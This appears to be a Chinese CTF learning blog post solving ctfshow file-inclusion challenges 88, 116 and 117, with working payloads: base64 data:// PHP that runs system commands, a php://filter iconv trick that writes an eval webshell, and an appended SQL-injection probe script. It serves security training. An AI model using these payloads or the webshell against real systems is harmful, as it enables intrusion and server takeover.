ctfshow学习记录-web入门(文件包含88&116-117)


web88

解答:这次过滤的比较多,但是没有过滤:,可以使用php伪协议data。过滤了=,进行base64的时候需要把=去掉,它并不会影响前面字符的解码。
<?php system(ls);?>转base64:
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKGxzKTs/Pg在这里插入图片描述最后cat读取flag。
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmwwZy5waHAnKTs/Pg
在这里插入图片描述


web116

提示:misc+lfi
解答:提示说misc,和杂项有关。打开题目是一段视频,下载下来看看。
010Editor查看一下,发现了png。
在这里插入图片描述将png图片数据导出,发现图片是一段代码信息。分析可知需要file传参,如果不传参就会播放sp2.mp4的视频。
代码中的file_get_contents()可以直接读取文件。
在这里插入图片描述

获取flag,也没有给flag在哪的提示,所以就直接猜测当前目录下有flag文件:?file=flag.php

(页面信息以mp4显示,按理右击可以下载,但是也不知道什么问题点了下载没反应,所以最后就用burp抓包查看了。)
在这里插入图片描述


web117

解答:两个参数,有过滤,有die。
string字符串过滤器被过滤了,base64也被过滤了,但还有convert.iconv.

把一句话木马从UCS-2LE编码转换为UCS-2BE编码。

<?php
$result = iconv("UCS-2LE","UCS-2BE", '<?php @eval($_POST[jz]);?>');
echo "payload:".$result."\n";
?>
#?<hp pe@av(l_$OPTSj[]z;)>?

?file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=jiuzhen.php
post:contents=?<hp pe@av(l_$OPTSj[]z;)>?

蚁剑连接,或者直接访问jiuzhen.php,post传参。
在这里插入图片描述

进一步学习

谈一谈php://filter的妙用

php://filter的各种过滤器

### CTF SHOW Web 类别挑战资源与解决方案 对于参与CTF SHOW平台上Web类别的挑战,特别是针对`web4`这一具体题目,可以借鉴一些通用的Web安全漏洞利用技巧以及特定于该平台的经验分享。通常情况下,这类挑战会涉及到常见的Web应用程序漏洞,如SQL注入、跨站脚本攻击(XSS)文件包含漏洞(LFI/RFI)等。 为了更好地理解和解决这些挑战,可以从以下几个方面入手: #### 学习基础理论和技术 深入理解HTTP协议的工作原理及其请求响应机制是非常重要的。掌握如何通过浏览器开发者工具分析网络流量可以帮助识别潜在的安全问题[^1]。 #### 利用在线学习资源 有许多优质的网站提供了关于Web渗透测试的学习材料和实践环境,例如OWASP Top Ten项目文档,它列举并解释了当前最严重的Web应用风险;还有像PortSwigger Academy这样的平台提供了一系列课程来教授各种类型的Web漏洞挖掘方法。 #### 参考社区讨论和Writeup 加入相关的技术论坛或社交媒体群组,在那里可以看到其他参赛者发布的writeups(解题报告),这对于获取灵感非常有帮助。GitHub上也有很多开源仓库专门收集整理了不同赛事下的高质量writeup链接集合。 ```python import requests def check_sql_injection(url, param): test_payload = &quot;&#39; OR &#39;1&#39;=&#39;1&quot; data = {param: test_payload} response = requests.post(url, data=data) if &quot;Welcome&quot; in response.text: print(f&quot;[+] SQL Injection vulnerability detected on parameter &#39;{param}&#39;!&quot;) else: print(&quot;[-] No SQL Injection found.&quot;) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值